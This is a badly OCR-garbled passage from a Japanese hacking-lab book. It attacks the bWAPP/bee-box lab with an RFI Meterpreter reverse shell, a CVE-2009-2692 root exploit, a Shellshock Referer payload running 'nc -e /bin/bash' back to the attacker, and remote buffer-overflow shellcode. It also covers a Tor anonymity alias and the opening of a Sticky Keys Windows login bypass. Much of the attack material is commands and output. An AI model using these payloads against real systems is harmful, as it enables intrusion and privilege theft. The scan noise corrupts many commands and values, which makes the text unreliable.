marrhbish IDx: ア 7 アロ ル ar な 5DOOoWnd'/hlUSh imalLxB' き mallJyarrrmial/hIMSh rews x す rwSJyarSpooWnewSs hlVSh 
MUCD.X:10.10.UuUCD/Ma7SDKOOUUUCDJDIW'sh DWOXYX.13.13.pfOXybDIhJhish WWW て jata.x:33.33:wvrw-ala ル ョ f 
wwwhbevsh backupx:34:34:backup:varrbackupsJhvsh IStx:38-38:MalWng List Managervarlst/pmmV'sh 
WC:X:39:39.irc ん arruiVircd/DbIIVSh  qmatsx:4141Grists BudrReDordind System (admin)Jvarbqnais bmVsh 
nODOdy x 65534.65534'nobody7nonexSiernbevsh IhuMdx:100.101 wmr 川 bylIDuudJbIV'Sh 


hcp_.x:101 1027norigx 5n[/DivTalsg syslInp:x:102.1037homglsyslorn: 活 ma 5g KIDOX:103.10M-/Iomgk ID 





図 7-38 */etc/passwd" ファ イル を 開い た と ころ 


$④ RFI で 用 いる PHP 用 の リバ ー ス シェ ル を 作成 する 
次 に RFI の 脆弱 性 を 突い て み ま す 。Kali 側 で 次 の よう に 入力 し て 、PHP 用 の り リ 
バー スシ ェ ル を 作成 し ます 。 こ こ で 、Kali の IP アド レス を 1000.2 と し ます 。 


root@ka11:<# msfvenom -Dp php/meterpreter reverse tcp 
LHOST=19.9.9.2 LPORT=4446 -† raw -o /var/www/htm1/evi1 .tx て 

No platform was selected, choosing Msf: :Modu]e : : Platform: : PHP .」 
from the payload 

No Arch selected, selecting Arch: php from the payload 

No encoder or badchars spec1†1ed , outputt1ng raw payload 
Payload s1ze: 39395 bytes 

Saved as: /var/www/htm」/ ev1l .tx 二 

Poot@⑳kal1:< 菩 1s /var/www/ html/ ev .tx モ 

/var/www/ htm1/ evi」 .t て xt 
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LPORT で 指定 し た ボー ト 4446 は 、 リ バー スシ ェ ル の 待ち 受け ボー ト に な り ま 
す (待ち 受け 状態 は 後 で 作る )。 
次 を 入力 し て 、Apache を 起動 し ます 。 


Foot 個 ka11 :<# serv1ce apache2 start 


これ で 、 外 部 か ら http//10.0.0.2/eviltxt に アク セス で きま す 。 PHP か ら 読 み 込 
め ば 、 リ バー スシ ェ ル が 起動 し て 、 指 定 し た IP アド レス と ポー ト 番 号 に 対し て ア 
クセ ス し ます 。 


5 リバ ー ス シェ ル か ら の 接続 を 待ち 受け る 
Kali 側 で Metasploit を 起動 し て 、 リ バー スシ ェ ル か ら の 接続 を 待ち 受け ます 。 


PootQKa11 :<# msSfTconsole 

( 略 ) 
mS 和 † > uSe eXD1O1t/multi/handler 
ms 和 † exploit(mult1/handler) > set LPORT 4446 
LPORT => 4446 ステ ッ プ (②⑦ で 指定 し た ボー ト 番 号 と 同じ に する 。 
msf exploit(mu1ti/handler) > set LHOST 19.9.9.2 
LHOST => 19.9.9.2 
mmS 和 † exp1oi て (multi/handler) > set PAYLOAD php/meterpreter_reverse tcp 
PAYLOAD => php/meterpreter_reverse て tcp 
msf exploit(mu1ti/handler) > run 






[*] Started reverse TCP handler on 19.9.9.2:4446 
(待ち 受け 状態 に な る ) 


6⑥ リ バー スシ ェ ル の 接続 を 確立 させ る 

URL に |http://10.0.0.103/bWAPP/rlfiphp?language=http://10.0.0.2/eviltxt」 を 
指定 し て アク セス し ます 。 プ ラウ ザ に は 何 も 表 示さ れ ま せん が 、 動 作 的 に は リ 
バ パー スシ ェ ル の スク リプ ト で ある eeviltxt ファ イル を 実行 し て いま す 。 そ の た 
め 、Firefox で あれ ば 、 タ プ ブ に 処理 中 の アイ コン が 表示 され 続け ます 。 
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7 シェ ル を 奪取 する 
Kali 側 に て Meterpreter セ モッ ショ ン が 確立 され て 、 プ ロン プ ト が 返っ て きま す 。 
ここ で は シェ ル を 起動 し ます 。 


[*] Meterpreter session 1 opened (19.9.9.2:4446 -> | 
19.9.9.193: 46224 ) at 2918-95-27 99:12:13 -9499 





meterpreter > she11 Meterpreter プ ロン プ ト が 返っ て きた の で 、 シ ェ ル を 礁 取 す る 。 
Process 7827 created . 
Channel 9 created. 


1d コマ ンド を 入力 で きる 。 


u1d=33( www-data ) g1d=33( www- da て ta ) EoOuDs=33( www - data ) 
whoami コマ ンド の 出力 結果 。 
wWvw-data に あの リド p』| 





コマ ンド を 入力 で き て いま す が 、 プ ロン プ ト が 表示 され て いな い の で 使い に く 
いと いえ ます 。 そこ で 、 次 の よう に 入力 し ます ( 図 7-39)。 


python -c "1mport pty: pty.spawn("/bin/sh“")”" 
$ 

$ id 
1d 入力 コマ ンド が 表示 され る が 、 無 視 し て よい 。 

u1d=33( www-data ) g1d=33( www-data ) grOuDs=33( www-data ) 





$ whoam ュ 
whoami 


www- da ト a 
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meterpreter > shell 

ge て - 但 寺 /- ア イア 還 コ エ ゴ : 11 コ 

qiEIIIIH 析 ( 導 5 ゴ -1 さ コ 

1q 

u1d=33 (wwvw - data) q ュ 1d=33( www- data) FTOuD5=33 (www- data ) 
PleE1b 

wwwy- dat8 


Dython -C "1mDOrt pty: pty.Spawn("/Db1n/sh" ) 
ゎ 1d 


U1d=33 (www - data) 1d=33( www- dta) QFOUDS=33 (www- td ) 
$ WhOam1 

whoam1 

wwy- data 

さ 





図 7-39 RFI に 成功 し て シェ ル を 奪取 し た と ころ 


ww 

ーー 
/ ビ FT 
= 

AA ai 
に マミ 2 


な お 、 シ ェ ル や セッ ショ ン を 抜け る に は 、exit コマ ンド を 


8 root 権 限 を 碧 取 する 


root 権限 を 狙い ます 。 通常 は 、wget コ マン ド で Exploit を ダウ ン ロ ー ド し ます 


1 


と ころ が 、 bee-box の /yar/www/evil ディ レク トリ 内 に bee-box の 脆弱 性 を 突く 


1 


Exploit が 揃っ て いる で 、 こ れ ら を 使い ます 。 


$ cd /var/www/ evi1 Exp1oit の ある ディ レク トリ に 移動 する 。 
Cd /Var/www/ evi1 





$ 1s 

1s 
TestSSLServer.]ar heartbleed.Dy sq]lite.Dy XdX .aS 

attacKk -COFrs . htm ng1nX dOS.Dy SSr†- 1 .tx XdX.DhD 
Cc1ick]acking.htm Oo-Saft.gz SSr† - 2 .tx Xdx . Swf 
CVe-2999-1185.c FT1 .txt SSFr†- 3 .txt XSS Steal Secret.]S 


CVe-2999-2692.tar sandbox .htm stea] stuff.htm xst.]S 
$ tar -xvf cve-2009-2692.tar 

tar -XVT CVve-2999-2692 .tar 

CVe-2999- 2692/ 

CVe-2909- 2692/cve-2099 - 2692 . sh 

CVe-2099- 2692/exploit.C 

CVe-2999 - 2692/Dwnkernel.C 
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$ cd cve-2099-2692 
Cd cve-2099-2692 


$ sh cve-2999-2692 .sh シェ ルス クリ プ ト を 実行 する 。 


[+] Persona1ity set to: PER_SVR4 
ALSA 11b conf.c:3952:(snd config expand) Unknown parameters 9 
( 略 ) 
[+] Disabled security of : AppArmor 
[+] Got root! 


# 1d root の プロ ンプ ト が 返っ て きた 。 
1d 


uid=9(root ) gid= の (root) grouDs=33( www-data ) root 権 限 の 礁 取 に 成功 し て いる 。 


沙 Shellshock 


Shellshock と は 、 bash の 脆弱 性 を 突い て 、 HTTP 要 求 の Referer か ら 任意 の コマ 
ンド を 送り 込む 攻撃 で す 。 


1) 「Shellshock Vulnerability (CGD」 の ペー ジ を 表示 する 

右上 の 「Choose your bug] の プル ダウ ン メ ニュ ー で 、「A9 - Using Known 
Vulnerable Components」 内 の |Shellshock Vulnerability (CGI)」 を 選択 し て 、 
[Hack] ボタ ン を 押し ます 。 す る と 問題 ペー ジ が 表示 され ます ( 図 7-40) 。 


/ Shelehock VulneroPlity (C 包 ) / 


The versi0h 0 Bash 5 vulnerahle io he Bas IMShe 販 hoOCK buq! (bee-box only) 


HINT aack 由 ie referer header, and Dwn IS DoX.… 


5 (S miy 加 S【 BaS れ SC7ID[ 
CUG USe/- MVW・OG[a 





図 7.40 [Shellshock Vulnerability (CGID] の ペー ジ 


bee-box に は 、 shellshock の 脆弱 性 を 持つ bash が イン スト ー ル され て いる と 書か 
れ て いま す (これ が 攻撃 の ヒン ト )。 
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②) Web ページ の ソー ス を 確認 する 
Web ペ ー ジ の ソー ス を 表示 する と 、 次 の コー ド が 見 つか り ま す 。 


<iframe frameborder="9" src="./cgi-bin/she11shock.sh" .」 
height="299" width="699" scro11ing="no"></ ュ frame> 


shellshock'sh が リン ク に な っ て いま す 。 リ ンク を 飛ぶ と 、|view-source:http:// 
100.0.103/bWAPP/cgi-bin/shellshock'shl に アク セス し 、Web ペ ー ジ の ソー ス が 
表示 され ます ( 図 7-41) 。 


| <】0OCTYPE jr【> 
<htnL> 


- <head 
<Hnk rel=stylesheet tyPe-text/css href に 。 1 


<tittesbWAPP - Shettshock Mutnerabitity 〔CGL)</t ュ ト Le> 
、 </headz 

< も ody> 

<djiv 3d=f Fame> 


| Th1s is my frst Bsh script :]<br / な > 
て Current user: 





図 /-41 Web ペ ベー ジ の ソー ス 


また 、http://10.0.0.103/bWAPP/cgi-bin/shellshock'sh に アク セ モス する と 、 実行 
結果 が 表示 され ます 。 

以上 より 、 ペ ー ジ の HINT の 下 の 文字 列 は 、 "shellshocksh" を 実行 し た 結果 で あ 
る こと が わか り ま す 。 


3 Burp で HTTP 要 求 を 捕捉 する 

Burp を 起動 し て |Intercept is on」 の 状態 に し ます 。Firefox で http://10.0.0.103 
/bWAPP/cgi-bin/shellshock.sh に アク セス し ます 。 す る と 、Burp は HTTP 要 求 を 
捕捉 し ます 。[Action] ボタ ン > [Send to Repeater」 を 選び ます 。 そ の 後 、 
| Intercept is off] に し て お きま す 。 

「 Repeater」 タプ に て 、 送 信 を 止め た HTTP 要求 が 表示 され る の で 、Referer 行 
を 追加 し ます (Shellshock の 脆弱 性 が ある か を 確認 する 命令 )。 
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GET /bMAPP/cgi-bin/shel11shock.sh HTTP/1.1 
Host: 19.0.0.163 
User-Agent: Mozi11a/5.9 (X11: Linux x86_64: rv:52.9) Gecko/29199191 .」 
Firefox/52 .9 

Accept: text/html , app11ication/xhtml+xm1,app11cation/xm] :q=9.9,*/*:q=9.8 
Accept-Language: en-US,en:q=9.5 

Accept-Encoding: gzip, deflate この 行 だ け を 追加 する 。 
Referer: ( ) { bMAPP: }: echo: /bin/echo "shel11 shock" 

Cookie: PHPSESSTD=f165bf97cd929c5e5d433e2b81989169: security_]eve]=9 
Connection: cl1ose 

Upgrade-TnSecure-Requests: 1 








[Go] ボタ ン を 押し て 、 この 偽造 し た HTTP 要 求 を 送信 し ます 。 図 742 の よう に 
ステ ー タ スコ ー ド 200 で HTTP 応 答 が 返っ て きま す 。HTTP 応 答 の 内 容 に 、"shel 








Burp Suite Community Edition v1.7.32 - Temporary Project ら ③ @ 
Surp 用 Luder Repealer Window Help 


| preet | roy | sweer | sonncr | ptrucer eemmeeml *<quecer | peceder | Conferer | xteneer | riecepmers | werepe lcm| 


Q 
[ 尽 」 


Reciuc で St で SDO TS で 



















し ICE デー ビーHIL 間 間 間 間 間 
ET /bWMAPP/<gs・ 本 sh NTTP/』 。 ュ 1 FI NTTP/A.1 269 OK 。 用 * 
os そ で: 92.158_55 _ Dat で : Sat.。 25 May 2018 20:33: 昌 9 GT 
5 を 「・AGeIt: NO> ia75。 9 (X11: LSngx X86 64: rv:52.0) Server: Apache/2.2.8 (Ubuntul DAV/3 nod fastCo1/3.4.6 
で cko/2010181 FSre ぞ ox/52 .6 PHP/5 . メ .3- う ubuntu5 with Suhosin-Fa そ ch aod | る る も 1/2 . メ . き 
ん て て ED < OptnSSL/10 .9.89 
eXt/htmL.aPpLLcataoh/XhtRL ゃ KmhL。 PD は 1 で @t ュ Oh/ き し | HO、 9 パプ *:qd。 Conneetson: で Lo3e 
: Content-TyP で : で cx モア /x-sh 
CC て で pt -Langua9e: eh-US.ef:qm ひ .5 Content-Lemgth:i 12 
で で ent<-Fnrodnnn: ra 。 dzf]1 < 
ReTerer: (]) { bWAFF: ]: ccha: /binm/echo *shellt shock* 
OOK1e: PPSESSID=1]16550197C0929 て SeS う 0⑬33e さ は bR10891600: 
5 で Cu「:tY_ leyet=1 
onnec そ 3on: と Lose 
PO'ade-TnSeCure-Requests: 1 ③HTTP 応答 が 表示 され ます 。 
①Referer 行 を 追加 し ます 。| 議 "shell shock" と いう 文字 列 が エコ ー 
され た た め 、Shellshock の 脆弱 性 が 
ある と 確信 で きま す 。 
4 
| < | 上 * | 拍 還 | | | ye earoi term | Es | ? | | < 日 -+ | | = 功 ど De 9 5 で 3 が berr _ 0 makhes 
Done 254 bytes | 1 mlls 


図 7-42 偽造 し た HTTP 要 求 に 対す る 反応 
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shock と いう 文字 列 が あり ます 。 こ れ は echo コ マン ド で 返っ て きた も の と 判断 で 
きま す 。 つ まり 、 タ ー ゲ ッ ト 上 端末 は Shellshock の 脆 性 を 持つ と 確信 で きま し た 。 


④ リ バー スシ ェ ル で 接続 する 

shellshock を 利用 し て リバ ー ス シェ ル で 接続 し て み ま す 。 Kali の Terminal を 起 
動 し て 、 次 を 入力 し ます 。 こ れ で Netcat は ボー ト 5050 で 待ち 受け 状態 に な り ま 
す 。 


Poot 個 ka11:<# nc -nlvp 5959 
1istening on [any] 5959 ... 


Burp の |Repeater]」 タブ に て 、HTTP 要 求 の Referer 行 を 次 の よう に 書き 換え 
ます 。 


Referer: () { bMAPP: }: echo: /bin/nc -e /bin/bash 19.9.9.2 5959 


[Go] ボタ ン を 押す と 、 Netcat 側 で 接続 が あっ た こと が 表示 され 、 コ マン ド 入 力 
が で きま す 。 よ っ て 、 リ バー スシ ェ ル の セッ ショ ン が 確立 され まし た 。 


汐 リモ ー ト バッ ファ オー パー フロ ー 


1①) 「Buffer Overflow (Remote)」 の ペー ジ を 表示 する 

右上 の 「Choose your bug] の プル ダウ ン メ ニュ ー で 、「A9 - Using Known 
Vulnerable Components」 内 の 「Buffer Overflow (Remote)」 を 選択 し て [Hack] 
ボタ ン を 押し ます 。 す る と 問題 ペー ジ が 表示 され ます ( 図 7-43) 。 


/ BuFFer OverFow (Kemole) / 


A speCific bWAPP network service is vulnerable to a remote buler overflow GetrODlI (bee-box only) 
HINT w90*354 + ixa7w8fuoO4v06 + [payloadl 
ThanKs to David Bloom (Qphilophobla79) for developing he C++ HOF applcatonl 





7-43 「Buffer Overflow (Remote)」 の ペー ジ 
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ヒン ト と し て 、 リ モー トバ ッ フ ァ オ ー バ ー フ ロー の 脆弱 性 を 持つ サー ビス が 動 
いて いる と 書い て あり ます 。 


②)bee-box を ボー トス キャ ン す る 
nmap で bee-box を ポー トス キャ ン し ます 。 





ボー ト 666 以 外 は 、 比較 的 よく 見 か ける サー ビス で す 。 ポー ト 666 は 独 和 目 の サ ー 
ビス と 推測 で き 、 何 ら か の 脆 玉 性 を 含ん で いる 可能 性 が 高い と いえ ます 。 


⑬) シェル コード を 作成 する 
次 の コマ ンド で リバ ー ス シェ ル 用 の シェ ルコ ー ド を 作り ます 。 シ ェ ル コー ド と 
は 、Exploit で 用 いる 攻撃 コー ド の 断片 で す 。 
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No platform was selected, choosing Msf: :Module: :Platform: :Linux 
from the pay1oad 

No Arch selected, selecting Arch: x86 from the payload 

Found 19 compatible encoders 

Attempting to encode payl1oad with 1 iterations of x86/.」 
shikata_ga na 

x86/shikata_ga_na1 succeeded with size 159 (iteration=9 ) 
x86/shikata_ga_ nai chosen with final size 159 

Payload size: 159 bytes 

Final size of py file: 739 bytes 

buf = "" 

DuT += "\xdd\xC4\xd9\x74\x24\x 和 †4\xDd\x1e\x4 和 T\xD3\x34\x5a\x31" 
Duf += "\xC9\xD1\x1 和 †\x31\x6a\xX1a\X83\Xea\xTC\x93\x6a\x16\xe2" 
Duf += "\xeD\x25\xD9\x6a\x22\x61\x4a\x71\x17\xd6\xe6\x1C\x95" 
Duf += "\x68\x6e\x68\x78\x45\xeT\xTd\x21\x3e\x 和 Ta\x91\xd5\xDc" 
Duf += "\x92\x93\xd5\xd1\x の 92\x8d\x34\xDD\xa4\xd5\xe6\x6d\x7e" 
Duf += "\x6T\xe7\xCd\x4d\xeT\x62\x11\x34\xe9\x22\xe6\x 和 fa\x61" 
Duf += "\x18\x96\x95\x72\x94\x6d\x の 95\x18\xD1\x 和 TS8\xe6\xed\x79" 
Duf += "\x37\x68\x88\x42\xD1\xd4\x78\x65\x 和 TO\x20\xC6\x69\xe4" 
DuT += "\X2e\xX38\xXeO9\Xe7\Xee\Xd3\x 和 Te\x26\x13\x2T\x4e\xd5\x19" 
Duf += "\xDO\x2D\xe6\xda\xa1\X68\xX6e\x 和 †TD\x5D\x38\x7C\x4C\x58" 
DuTf += "\x89\x 和 Td\x29\x9T\xX69\xX 和 TC\XCe\XC1\xX31\x91\x31\x92\x41" 
Duf += "\xD9\x39\x92\x41\xDd\x 和 ffT\x82" 


buf の と ころ が シェ ルコ ー ド に な り ま す 。 マシ ン 語 で 記述 され だ た ペイ ロー ド の よ 
うな も の で す 。 LHOST や LPORT の 値 が 変わ れ ば 、 buf の 文字 列 も 変わ る こと に 注 
意 し て くだ さい 。 

それ で は 、 こ の シェ ルコ ー ド を 送信 する た め の Exploit を 作成 し ます 。 ヒ ント が 
問題 ペー ジ に 書い て ある の で 参考 に し ます 。 


"666_exploit.py" フ ァイル 


#!/usr/bin/python 
井 - ま - Cod1ng: ut†-8 - ギ ま - 
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④ リ バー スシ ェ ル を 待ち 受け る 
Metasploit で リバ ー ス シェ ル の 待ち 状態 を 作り ます 。 
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⑤)Exploit を 実行 する 
別 Terminal で Exploit を 実行 し ます 。 


root@ka11i :<# python 666_exploit.py <bee-box の TP アド レス > 


(⑥ シ ェ ル を 奪取 し て 権限 を 確認 する 
攻撃 に 成功 する と 、 Meterpreter セッ ショ ン が 確立 され 、 プ ロン プ ト が 返っ て き 


ます 。 shel コ マン ド で シェ ル を 奪取 し て か ら id コ マン ド を 実行 し ます 。 す る と 、 
root 権限 で ある こと が わか り ま す 。 


meterpreter > shel1 

Process 15815 created . 

Channel 1 created. 

1d 

u1d=9(root) gid=9(root) 


ログ アウ ト し て も ジョ ブ を 終了 させ な い 


シェ ル 上 で パッ ク グ ラウ ンド ジョ プ ブ を 実行 し た 状態 で ログ アウ ト す る と 、 そ の 
バッ ク グ ラウ ンド ジョ プ も 終了 し て し まい ます 。 こ れ は ログ アウ ト 時 に ハン グ 
アッ プ (HUP) シグ ナル が プロ セス に 送ら れる か ら で す 。 

送 に プロ セ モス が ハン グ ア ッ プシ グ ナ ル を 無視 する よう に 設定 すれ ば 、 勝 手 に 終 
了 す る こと は あり ませ ん 。 こ れ を 実現 する に は nohup コマ ンド を 用 いて 、 次 の よ 
うに 入力 し ます 。 す る と 、 ロ グ ア ウ ト し て も hogehoge は 動作 し 続け ます 。 後日 ロ 
グイ ン し て か ら "resultitxt' ファ イル を 確認 し ます 。 


# nohup hogehoge > result.txt 2> /dev/nul1] & 
この テク ニッ ク は ハッ キン グ ・ ラ ボ で は あま り 使 用 し ませ ん が 、 ハ ッ キ ング の 


場 で は 用 いら れる こと が あり ます 。 
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Kali 向 け の エイ リア ス の 紹介 その ら 


簡単 に 匿名 イン ター ネッ ト ア クセ ス を 実現 する エイ リア ス を 紹介 し ます 。 これ 
を 実行 する と 、 匿 名 の 状態 で Firefox に より イン ター ネッ ト に アク セス で きま す 。 
まず 、 匿 名 通信 ツー ル で ある Tor を イン スト ー ル し ます 。 


Poot 條 kal1:<# apt 1nstall tor -y 


次 に 、HTTP/SOCKS4/SOCKS5 に 対応 し た Proxy 設 定 ツ ー ル で ある 、Proxy 
Chains の 設定 ファ イル を 開き ます 。 


Poot 條 ka11:<# nano /etc/proxychanns . Con 


strict chai 行 を コメ ント アウ ト し て 、dqdynamic_cham 行 の コメ ント アウ ト を 外 
し ます 。 さ ら に 、"socks4 1270.0.1 9050" の 行 の 下 に "socks5 127.0.0.1 9050" を 追加 
し ます (9050 は Tor サー バー の 待ち 受け ポー ト )。 

これ で 準備 が で きた の で 、 次 の エイ リア ス を 登録 し ます 。 コ マン ド を 連続 し て 
実行 する た め に 「:」 演算 子 を 使っ て いま す (コマ ンド が 失敗 し て も 、 次 の コマ ン 
ド を 実行 する )。 


alias hideme='ki11a11 firefox-esr: service tor start: sleep 5: 
proxychains firefox-esr http : //www .whatismyipaddress .com http: | 


//www. google .com: " 


hideme コマ ンド を 実行 する と 、 Forefox が 再起 動 し 、Tor サ ー バ ー 経 由 で 指定 し 
た URL に アク セス し ます 。WhatlsMyIPAddress.com の Web ペ ー ジ に 本 来 の グ 
ロー バル TIP アド レス 以外 が 表示 され て いれ ば 、 匿 名 化 に 成功 し て いま す 。 Firefox 
を 閉じ な い 限 り 、 了 名 の 状態 を 維持 し た まま に な っ て いま す 。 
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第 2 部 
ハッ キン グ を 体験 する 


人 


ログ クオ ン 認 証 の 
ハッ キン グ 


今 、PC や スマ ホ の 普及 に より デジ タル 遺品 の 取り 扱い が 問題 と な っ て い 
ます 。 デ ジタル 遺品 と は 、 故 人 の デジ タル 機器 に 残さ れ た 情報 (遺品 ) で す 。 
遺族 は デジ タル 遺品 を 回 収 し た いと 願い ます が 、 ログ オン パス ワー ド が わから 
な けれ ば アク セス で きま せん 。 

557/ ら 11KSP gp ん: まま っ 】 に で 二 0 叫 49 中 の / 中 553[ り 】91 に 
接続 し て デー タ を 抽出 する 」 と 、⑧ 「 ロ グ オ ン 認 証 を 突破 し て デー タ に アク セ 
ス す る 」 と いう ら つ の アプ ロー チ が あり ます 。 本 草 で は ② の アプ ロー チ を 実現 
する 方 法 を 紹介 し ます 。 





8-1 | Sticky Keys 機 能 を 悪用 し た ログ オン 画面 の 突破 





Sticky Keys 機 能 (C1) と は 、 和 補助 キー ([Shift] キー、 [Ctrl] キー、 [Alt」 キー、 
[Win] キー) と 他 の キー の 同時 入力 が 難し いと いう 、 身 体 的 ハン ディ キャ ッ プ の 
ある 人 向け の ユー ザー 補助 機能 で す (*2)。 こ の 機能 を 有効 に する と 、 同 時 に 押す 
代わ り に 、 順 次 押せ ば よく な り ま す 。 固定 キー 機能 と も 呼ば れ ま す 。 

例え ば 、Windows 端 末 で [Shiftl キー を 5 回 押し て みて くだ さい 。 す る と 、 
Sticky Keys 機 能 を 有効 に する か どう か の 確認 ダイ アロ グ が 表示 され ます ( 図 
8-1) 。 こ れ は 、 ロ グ オ ン 認 証 画 面 で も 通用 し ます ( 図 82)。 


軸 定 キー 検 艇 を 有効 に し ます か ? 
回 キー 層 能 を 右 入 に する と 、 キ ー そ 回 店 に 津 さ な く て 名 、SIhift、C、 AML、 ま 
た は windows ロゴ キー の 想 能 を 使用 で きま す . Shift キー を 5 回 押す と 、 加 定 
キー が 有効 に な り ま す 。 





図 8-1 固定 キー 機能 の 有効 確認 ダイ アロ グ 


"1 : "sticky" と は 「 粘 つく 」「 気 難し い 」 と いう 意味 で す 


"2 : https//www.microsott.com/]a-jD/enable/products/windows/stckykeys.asDX 
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re Windows 7 5P1(32 < 


ファ イル 仮 垢 マシ ン 表示 入力 テバ イス ヘル プ 「 


Do ou Want 16 thrm on Shcik。 Keys! 
Sbc ky Keys lets you uze he SHIFT. て TRL ALT. or Windows Logo keys by press09 
one ker さも nne_ The keyboard snortcut to urmm on SRncicy Keys is to Pf で ss で 
SIFT ksy 5 Umes 


半 . VVITdOWS / Profession 





区 の ぎみ 自 加 召還 ⑨ 回 oe・Ae 


図 8.22 ログ オン 誰 証 画面 で の 有効 確認 ダイ アロ グ 


この 仕組 み を 利用 し て 、 ロ ー カ ル ア カ ウン ト の パス ワー ド を リセ ッ ト し た り 、 
新しい 管理 者 ユー ザー を 作っ た りす る 方 法 を 紹介 し ます 。 やり方 は 簡単 で 、2 回 ほ 
どの キー 人 力 、2 回 の 再起 動 、 い くつ か の コマ ンド 実行 だ け で す 。 

ここ で は 、Windows 7 の 仮想 マシ ン を 対象 に し ます が 、 実 機 が ある 場合 に は そ 
ちら で 試す と よい で し ょ う 。 


汐 Sticky Keys 機 能 で ログ オン 画面 を 突破 する 


1①Windows 10 の イン スト ー ル ディ スク 用 の iso フ ァイル を タウ ン ロ ー ド する 

Microsoft Evaluation Center か ら 、Windows 10 の イン スト ー ル ディ スク 用 の 
iso フ ァイル を ダウ ン ロ ー ド し ます 。 こ れ は Windows 10 の 仮想 マシ ン の 作成 に も 
利用 し た は ず な の で 、 す で に ダウ ン ロ ー ド 済み で あれ ば それ を 用 いて くだ さい 。 





| 第 8 章 | ロ プ オン 認証 の ハッ キン グ ブ 661 


Microsofk Eyaluation Center - Windows 評価 版 ソ フト ウェ ア (Windows 10 Enterprisc) 





https:// www.microsoft.com/ ja-jP/eyalcenter/evaluate-windows-10-cnterprise 


ター ゲッ ト 端 末 の CPU の ビッ ト 数 に 合っ た も の を 選び ます 。 これ 1 つ あ れ ば ば 、 
どの バー ジョ ン (Windows XP / 7 / Vista / 8 / 10) の ター ゲッ ト 上 端末 に 対し て も 
使用 で きま す 。 


'② イン スト ー ル 用 の DVD また は USB メモ リー を 作成 する 

iso フ ァイル を 用 いて 、 イ ンス トー ル 用 の DVD ある い は USB メ モリ ー を 作成 し 
ます 。 作成 し た メデ ィ ア は 、 ブ ー ト メデ ィ ア と も 呼ば れ ま す 。 こ こ で は 、 仮 想 マ 
シン を 用 いる の で この 処理 を 省略 し ます 。 


(3 フー トシ ー ケ ンス の 設定 を する (仮想 CD-ROM ドラ イフ に iso ファ イル を 指定 する ) 

実機 で あれ ば 、BIOS/UEFI に お いて プ ブート シー ケン ス の 設定 で DVD ドラ イブ 
や USB が 優先 する よう に し ます ("3)。 こ こ で は 、VirtualBox を 用 いて いる の で 、 
仮想 マシ ン の 仮想 CD-ROM ドラ イブ に 、 iso フ ァイル を 指定 し ます 。 


④)iso フ ァイル か ら ブ ー ト する 

Windows 7 の 仮想 マシ ン を 起動 し ます 。 

VirtualBox の 場合 は 、 す で に プ ブート 可能 な メデ ィ イア が セッ ト さ れ て いれ ば 、 
"Press any key to boot from CD or DVD" と いう メッ セー ジ が 表示 され ます ( 図 
8.3) 。[Enter] キー を 押し て 、DVD か ら プ ブー ト し ます 。 


3 : 320 の BIOS/UEFI の 解説 を 参照 し て くだ さい 。 
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| ファ イル 仮 婁 マミ 


ー 





VirtualBox 


ト デ バ イス の 切り 妖 


た 0 メ ア 


の ロゴ が 表 


7 が 表示 され て い \ 


うろ 
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た ー ア 1 四 ディー ココ 
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(や di F ウレ 末 二 (19] Leit Mrdnyws ・ 
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図 8.4 ブ 


〆 


ー ト デバ イス の 切り 替え 画面 


回 いみ ョ 戸 赴 選 ②⑳jCrAl 
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5 インス トー ル を 開始 する 


Windows 1() の ) し 』 ゴ カ 1 去 示 ベ | 


が 


待つ と 、Windows セッ ト ア ッ プ 


トー 
サ + 
に 

ぶ + 


画面 が 表示 され ます ( 図 85)。 


Er Wndows 7 5P1(32btt, EN) [イン ス トー ル 恒 村 ) 中 ] - Orode VM VirtuolBqx 
ファ イル 人 環 マシ ン 家 示 ス 力 デバ イス ヘルプ 





tm Wndowt ゼット デップ 


トー MIale le に 


アプ トー する っ 3 LE 


ESLPIOGSNI ま ーー ド い 


キー ボー ド は た は 力 方 式 [) 邊 


 UT1G MIommeo そ ロロ oeomtiom reh1E rna# 





回 め 兄 グ ョ 当 天 旨 ② 加 Ce・A 





8.5 Windows セ ッ ト ア ッ プ 画面 


ナ 、+ ヽ メ テテ 、 ムイ 。 ツ な PP 
だ < 3 つ w ア テー の / グ ト PC 力 2 アプ aa / ト し の の た ) | 一 て ) / リ / リ コ ガ り アフ う d w D 1 や ア 還 し アプ W IT1OO W こ 
っ に sme ぉ 。 e ンー エキ コ 大 も コーブ 1 OO の /Pmy も と ここ に エ を と 三 ニ 3c 本 = 
10 の イン スト ー ル ディ スク で 起動 する と 、 図 86 の よう な 画面 が 表示 され ます 。 こ 
了 ヽ 【 て * - 1 デ ーーー PE 
ピリ 3 こさ さ w || ま 、 し 9 イ ー デ 人 リ レ 罰 ] 人 グ し | ] 意 ト 、 N も だ 起こ 
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Endows 7 5P1(3ZbK EN) [イン スト ー ル 牙 ) [東和 中] - Orode VH VirtualBox R = 


ブフ ァイル 仮 尋 マシ ン 家 示 入力 テバ イス へ ルプ 


(<!1@@) ん 18 


Press F8 fOr StartUD SettinQS 





回 〇 P グ ョ 思 可 人 ロ ② 加 Cl・A 
図 86 ビッ ト 数 の 差異 に よる 警告 画面 
二 呈 で は な く 、Windows セ ッ ト ア ッ プ 画面 が 表示 され た な ら 、 そ の まま [次 へ ] 


ボタ ン を 押し ます 。「 今 すぐ イン スト ー ル 」 と いう ボタ ン が 表示 され た 画面 が 出 た 
ら 、 下 の | コンピ ビュー タ を 修復 する 」 と いう リン ク を 押し ます ( 図 8-7)。 
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| Windows 7 5P1(32btt, EN イン スト ー ル 恒 休 ) 寄 行 中 ] - Orode VM VirtuolBoi 


ファ イル 人 舌 マシ ン 要 示 ユ ス 力 テバ イス へ ルプ 
| 


= Windows せ ゼット テッ ナブ 


曲 Windows 





回 ① 呼 ケ所 本 は ② Cl・At 


図 8-7 「 今 すぐ イン スト ー ル 」 画面 


6: オ フシ ョ ン を 選択 する 


ゃ を > am シ 11 W ま す ァ か 4 ーー 』ー こ = アト 1 さ ま 
] 」 主 圧 」 H ロロ 中 中 し 瑞 ど . m デ | 和 で ゝ ご | に 1 ト ) | ー < 3 ー | 4 ] 
9 夫 、 w | コ 枯 で ま 
P | ヽ し で 「 へ て 、 4 ! ず 4 ネ 』 
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トラ ブル シュ ー テ ィング 
ンー ェ # 箇 に 記す が 、 沈香 オ プション セ 





図 88 | オプ ショ ン の 選択 」 画面 


| 詳細 オプ ショ ン 」 画面 が 表示 され ます ( 図 89)。 こ こ で 、| コマ ンド プロ ンプ 
ト 」 を 押し ます 。 


2bt, EN) [イン スト ー ル 恒 修 ) 【 東 行 中 ] - Orode VM VituolBo 
